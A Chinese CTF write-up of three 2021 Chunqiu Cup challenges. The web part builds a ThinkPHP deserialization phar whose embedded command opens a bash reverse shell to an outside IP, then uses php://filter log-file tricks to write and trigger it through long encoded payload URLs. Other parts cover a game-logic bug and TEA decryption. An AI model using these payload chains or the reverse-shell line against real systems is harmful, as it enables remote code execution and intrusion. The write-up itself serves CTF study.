Web
easy_filter
跟国赛那个题很像,就是log文件的格式不大一样,改一改就好
用的RCEpayload:
https://www.freebuf.com/vuls/269882.html
生成phar:
<?php
$a = unserialize(urldecode("O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A54%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F47.104.134.135%2F2333+0%3E%261%27%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Ba%3A0%3A%7B%7D%7Ds%3A8%3A%22relation%22%3Bb%3A0%3B%7D%7D%7D"));
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
对phar进行编码
注意这里生成的payload每行结尾有多余的换行符和=,去除一下,然后把+编码成%2b
P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
thinkphp的日志文件在runtime/log/202105/29.log,下一步就是在本地调试下,尝试如何去掉多余的字符,只将我们的payload解码成phar文件
先清空日志:
index.php?s=/index/Index/hello&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
为了防止多余的等号影响payload的解析,我们这样传参index.php/index/Index/hello?file=
写入我们刚才生成的payload
index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
生成了如下格式的日志:
---------------------------------------------------------------
[2021-05-29T15:16:44+08:00] 127.0.0.1 GET 127.0.0.1/index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
[ error ] [2]file_get_contents(P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00): failed to open stream: File name too long
经过尝试,将payload修改成如下格式即可正常解码:
payload开头加入俩数字来使得前面的=正常解码,结尾加上a使得最终只出现一个payload
50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00P=00n=00U=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=00X=00V=00Z=00K=00W=00D=00l=00R=00w=00s=00R=00A=00g=003=00p=001=001=008=00O=00N=00k=002=00U=00P=00O=00w=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00a
再清空,发送payload
解码
index.php?s=/index/Index/hello&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
触发
成功执行,接下来就把命令改成tac /flag就好了
http://eci-2zegz186wmvgj36lmnge.cloudeci1.ichunqiu.com/index.php/index/Index/hello?file=50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00j=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00t=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00O=00T=00o=00i=00d=00G=00F=00j=00I=00C=009=00m=00b=00G=00F=00n=00I=00j=00t=009=00c=00z=00o=00y=00M=00T=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00H=00d=00p=00d=00G=00h=00B=00d=00H=00R=00y=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00z=00O=00j=00Y=006=00I=00n=00N=005=00c=003=00R=00l=00b=00S=00I=007=00f=00X=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00Y=00X=00B=00w=00Z=00W=005=00k=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00h=00O=00j=00A=006=00e=003=001=009=00c=00z=00o=004=00O=00i=00J=00y=00Z=00W=00x=00h=00d=00G=00l=00v=00b=00i=00I=007=00Y=00j=00o=00w=00O=003=001=009=00f=00Q=00g=00A=00A=00A=00B=000=00Z=00X=00N=000=00L=00n=00R=004=00d=00A=00Q=00A=00A=00A=00B=009=007=00L=00F=00g=00B=00A=00A=00A=00A=00A=00x=00%2b=00f=009=00i=002=00A=00Q=00A=00A=00A=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00p=006=00T=00n=00c=00B=00R=00c=007=00o=00Z=00V=00i=00m=00m=005=00n=00c=00l=00W=00t=00J=00y=00W=00w=007=00Q=00I=00A=00A=00A=00B=00H=00Q=00k=001=00C=00a
也可以弹shell
ctftaker
/source有源码
import { createHash } from "crypto";
import { readFileSync } from "fs";
import { resolve } from "path";
import {exit} from "process";
import cookieSession from "cookie-session";
import express from "express";
import { SessionData } from "express-session";
import * as CONST from "./const";
declare module "express-session" {
interface SessionData {
history: string[];
monster: SerializedObj[];
player: SerializedObj;
coin: number;
init: boolean;
}
}
interface SerializedObj {
ATK: number;
DEF: number;
HP: number;
factor: number;
name: string;
}
class Obj {
ATK: number;
DEF: number;
HP: number;
factor: number;
constructor(readonly name: string, factor: number|string, ATK?: number, DEF?: number, HP?: number) {
this.factor = factor = parseInt(`${factor}`);
this.ATK = ATK ?? factor * Math.random();
this.DEF = DEF ?? factor * Math.random();
this.HP = HP ?? factor * Math.random();
}
levepup(factor: number|string) {
this.factor = factor = this.factor + parseInt(`${factor}`);
this.ATK = factor * Math.random();
this.DEF = factor * Math.random();
this.HP = factor * Math.random();
}
fight(obj: Obj): [boolean, string[]] {
const his: string[] = [`${this.name}向${obj.name}发起了对战!`];
let selfHp = this.HP;
let objHp = obj.HP;
his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);
while(true) {
objHp -= this.ATK - obj.DEF;
objHp = Math.max(objHp, 0);
his.push(`${this.name}向${obj.name}发起攻击!`);
his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);
if(objHp === 0) break;
selfHp -= obj.ATK - this.DEF;
selfHp = Math.max(selfHp, 0);
his.push(`${obj.name}向${this.name}发起攻击!`);
his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);
if(selfHp === 0) break;
}
return [selfHp > 0, his];
}
static serialize(obj: Obj): SerializedObj {
return {
ATK: obj.ATK,
DEF: obj.DEF,
HP: obj.HP,
factor: obj.factor,
name: obj.name,
};
}
static deserialzie(obj: SerializedObj): Obj {
return new Obj(obj.name, obj.factor, obj.ATK, obj.DEF, obj.HP);
}
}
const app = express();
app.use(express.static(resolve("static")));
app.use(express.json());
app.use(express.urlencoded({extended: true}));
const secret = createHash("md5").update(`${Math.random()}`).digest("hex");
app.use(cookieSession({
secret: secret,
name: "session",
}));
console.log(secret);
function initSession(session: any): session is SessionData {
if(!session.init) {
session.history = [];
session.player = new Obj("Player", 0);
session.coin = 1;
session.init = true;
session.monster = [
Obj.serialize(new Obj("BabyCalc", 1)),
Obj.serialize(new Obj("MediumCalc", 2)),
Obj.serialize(new Obj("HardCalc", 5)),
Obj.serialize(new Obj("GodCalc", 10)),
Obj.serialize(new Obj("ImpossibleCalc", 100)),
Obj.serialize(new Obj("TotalImpossibleCalc", 1000)),
Obj.serialize(new Obj("????????Calc", 10000)),
];
}
return true;
}
app.use((req, res, next) => {
initSession(req.session);
next();
});
app.get("/his", (req, res) => {
if(!initSession(req.session)) return;
res.send({
message: req.session.history.join("n"),
});
});
app.get("/start", (req, res) => {
if(!initSession(req.session)) return;
req.session.history = req.session.history.concat(CONST.banner);
res.send({
message: CONST.banner.join("n"),
});
});
app.post("/levelup", (req, res) => {
if(!initSession(req.session)) return;
const {f} = req.body;
if(!f || f > req.session.coin) {
return res.send({message: "不大对呢"});
}
req.session.coin -= f;
const player = Obj.deserialzie(req.session.player);
if(player.factor > 50) {
return res.send({message: "你太强了,寻找更多的机遇吧"});
}
player.levepup(f);
req.session.player = Obj.serialize(player);
const msg = `${player.name}使用了${f}枚硬币升级了自己
现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`.split("n");
req.session.history = req.session.history.concat(msg);
res.send({message: msg.join("n")});
});
app.get("/monster", (req, res) => {
if(!initSession(req.session)) return;
if(req.session.monster.length===0) {
return res.send({message: CONST.footer.join("n")});
}
const monster = Obj.deserialzie(req.session.monster[0]);
res.send({
message: `${monster.name}出现了!ATK:${monster.ATK},DEF:${monster.DEF},HP:${monster.HP}`,
});
});
app.get("/status", (req, res) => {
if(!initSession(req.session)) return;
const player = Obj.deserialzie(req.session.player);
res.send({message: `${player.name}现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`});
});
app.get("/fight", (req, res) => {
if(!initSession(req.session)) return;
if(req.session.monster.length===0) {
return res.send({message: CONST.footer.join("n")});
}
const player = Obj.deserialzie(req.session.player);
const monster = Obj.deserialzie(req.session.monster[0]);
const [win, his] = player.fight(monster);
if(win) {
req.session.monster = req.session.monster.slice(1);
his.push("你赢了耶!");
} else {
his.push("你输了,刷新以重新开始");
req.session.init = false;
}
req.session.history = req.session.history.concat(his);
res.send({message: his.join("n")});
});
app.get("/source", (req, res) => {
res.send(readFileSync("./src/main.ts"));
});
app.get("/exit", (req, res) => {
exit(0);
});
app.use((err: any, req: any, res: any) => {
console.error(err.stack);
res.status(500).send("Something broke!");
});
app.listen(80);
重要的地方在这里
传入9999999/0,即可把自己的倍数增加到9999999,然后序列化保存
下次反序列化player的时候,player的属性就会超级加倍
一开始是个弱鸡
属性加倍
打出flag
Reverse
backdoor
首先程序会net listen监听端口
输入g01angBackd00r会执行 mai n_Decrypt函数
chal
直接打开文件
根据敏感变量名猜测是tea家族算法
提取出数据
3
3208527578,423585179
3.0
699878777,1677098023
3.4
1664154466,3464319808
3.8
3532878313,2922316096
3.12
2276156225,33987677
3.16
3775107838,3138262082
key
3735928559,3405691582,269488144,16843009
exp
#include <stdio.h>
#include <stdint.h>
//加密函数
void encrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
uint32_t delta=0x9e3779b9; /* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i < 32; i++) { /* basic cycle start */
sum += delta;
v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
} /* end cycle */
v[0]=v0; v[1]=v1;
}
//解密函数
void decrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */
uint32_t delta=0x9e3779b9; /* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i<32; i++) { /* basic cycle start */
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
sum -= delta;
} /* end cycle */
v[0]=v0; v[1]=v1;
}
int main()
{
uint32_t v[2]={3775107838,3138262082},k[4]={3735928559,3405691582,269488144,16843009};
// v为要加密的数据是两个32位无符号整数
// k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位
decrypt(v, k);
printf(",%u,%un",v[0],v[1]);
return 0;
}
本文始发于微信公众号(山警网络空间安全与电子数据取证):2021年春秋杯春季联赛部分WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论